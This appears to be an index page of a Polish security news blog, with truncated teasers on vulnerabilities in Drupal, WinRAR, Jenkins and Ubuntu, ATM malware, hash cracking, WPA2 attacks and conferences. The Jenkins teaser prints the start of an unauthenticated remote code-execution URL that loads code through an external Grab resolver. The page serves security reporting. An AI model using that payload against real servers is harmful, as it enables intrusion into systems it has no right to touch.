Właśnie załatano krytyczną podatność w Drupalu. Wiemy na razie niezbyt wiele – na pewno można ją wykorzystać bez uwierzytelnienia oraz ma ona miejsce w module API. Warunkiem możliwości wykorzystania podatności jest prawdopodobnie udostępnienie / włączenie jakiegokolwiek API. Więc na szybko Drupal zaleca wyłączenie metod RESTowych: PUT/PATCH/POST (choć najlepiej podnieść do wersji…
Czytaj dalej »
Podatność w WinRar (dokładniej mamy ich w sumie aż cztery: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253) umożliwia wypakowanie pliku z archiwum do dowolnego miejsca na systemie plików. Np. wypakowanie złośliwego pliku exe do katalogu autostartu w Windows (malware odpali się za każdym razem po restarcie systemu). Jak pisze Checkpoint: Akcja na filmie…
Czytaj dalej »
Akcja na filmie tutaj poniżej. Sam exploit jest stosunkowo prosty (do stworzenia od zera nawet na poczekaniu) – choć dojście do niego zdecydowanie nie było banalne. Całość sprowadza się do przygotowania na swojej maszynie stosownego pliku, a następnie odwołanie się do Jenkinsa (bez uwierzytelnienia) zwykłą przeglądarką: http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name=’orange.tw’,…
Czytaj dalej »
Sporo bankomatów nie jest aż tak bezpieczna jak się wydaje. Kaspersky opisuje ciekawą rodzinę malware na bankomaty. Interfejs wygląda nieco podobnie jak w jednorękim bandycie. Po instalacji przestępca wybiera kasetkę (1-4) oraz naciska SPIN (podobnie jak na popularnych automatach do gier). SPIN zaczyna wypłacać pieniądze, STOP zatrzymuje wypłatę, a SCAN sprawdza…
Czytaj dalej »
Możesz dzwonić 24 na dobę na szwedzki numer 1177 i skonsultować się w temacie problemów zdrowotnych: 1177 – Medical Advice Number – Sjukvårdsrådgivning. The phone number 1177 offers health care advice twenty-four hours a day, year-round, all over Sweden. Informacje te są dość poufne prawda? I chyba nikt nie spodziewał…
Czytaj dalej »
1100 zapisanych osób, prezentacje z hackowaniem na żywo, uznani prelegenci (wielokrotne #1 miejsca w ankietach na podobnych wydarzeniach mówią same za siebie). Wiedza jak chronić ale i jak atakować, możliwości swobodnego networkingu, świetne miejsce (sala koncertowa) z rewelacyjną jakością obrazu na projektorze (tak wiemy, różnie z tymi projektorami bywa na…
Czytaj dalej »
Zapraszamy na tegoroczną konferencję SEMAFOR. Sekurak jest patronem medialnym wydarzenia. Na miejscu Michał Bentkowski od nas pokaże w praktyce czym może grozić podatność XSS. Poniżej informacje od organizatorów: W czasie dwóch dni konferencji zaplanowaliśmy około 50 prelekcji opartych o case studies i 4 ścieżki tematyczne: Audyt IT, Techniczne aspekty bezpieczeństwa, Zarządzanie…
Czytaj dalej »
Chińczycy biorą przykład z zachodniego świata. Tym razem mamy firmę SenseNets, specjalizującą się w rozmaitych technikach monitoringu obywateli (rozpoznawanie osób z obrazu kamer): …jednak niespecjalizującą się w bezpieczeństwie IT: There is this company in China named SenseNets. They make artificial intelligence-based security software systems for face recognition, crowd analysis, and…
Czytaj dalej »
Mały podgląd możliwości Hashcata 6 (wersja beta), na karcie NVIDIA RTX 2080Ti. Łamanie hashy NTLM (wykorzystywanych do tej pory do przechowywania haseł w Windowsach) osiąga tu prędkość 102 gigahashe na sekundę: 102 Gigahashe na sekundę dają złamanie każdego hasła ośmioznakowego w czasie < 24h. Pamiętajcie, hasła co najmniej 8-znakowe (dowolna kombinacja…
Czytaj dalej »
Impreza tutaj, tutaj kubek. Mamy do rozdania 10 bezpłatnych biletów na nasze hacking party (każdy z kubeczkiem sekuraka :). Co trzeba zrobić? Najciekawsze 10 fotek (naszym subiektywnym zdaniem) nagrodzimy biletami (można wykorzystać dla siebie lub przekazać kumplom). Prośba też o dołączenie do maila info, że wyrażacie zgodę na publikację fotek na…
Czytaj dalej »
Jak być może wiecie z naszego poradnika, standardowy atak na WPA2 polega na przechwyceniu hasha użytkownika w trakcie jego logowania się do sieci. Jeśli nikt nie chce podłączyć się do sieci – po prostu wyrzucamy dowolnego podłączonego użytkownika (pakiety deauth) i po chwili znowu się zaloguje (prześle hasha). Wymaga to…
Czytaj dalej »
Kto nie oglądał jeszcze serialu Black Mirror – marsz do oglądania ;) To ponura wizja przyszłości (teraźniejszości?) z dużą dawką nowych technologii. Ocena obywateli – i związane z tym benefity? Proszę bardzo. Pszczoły drony, które… mogą być zhackowane i użyte jako broń? Czy to aby na pewno jest przyszłość…? Najnowsza…
Czytaj dalej »
Świetny opis podatności dającej lokalnie uprawnienia roota na Ubuntu (tzw. privilege escalation ze zwykłego użytkownika do roota). Podatne linie: Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS, Ubuntu 14.04 LTS. Opis pokazuje, że tego typu problemy to nie tylko czarna magia i omijanie piętnastu metod antibufferoverflow. Czasem może być prosto. Bardzo…
Czytaj dalej »
To wszystko na naszym wydarzeniu – MEGA sekurak hacking party. Mega – bo tym razem występujemy w sali koncertowej, a zapisanych jest już blisko 1000 osób! Po wydarzeniu będziecie wiedzieć żeby nie pożyczać kabli USB do ładowania telefonu, nie używać klawiatur bezprzewodowych (z małymi wyjątkami), od razu sprawdzicie czy w Waszych…
Czytaj dalej »
Nie obchodziliśmy dnia bezpiecznego Internetu, ale jak donosi nam jeden z czytelników – wiele serwisów i owszem. Dajmy na to Komputerświat uważa, że „mocne” hasło: Musi składać się z co najmniej ośmiu losowych wybranych dużych i małych liter, cyfr oraz znaków specjalnych. Zobaczmy więc. Różnych znaków w haśle możemy mieć…
Czytaj dalej »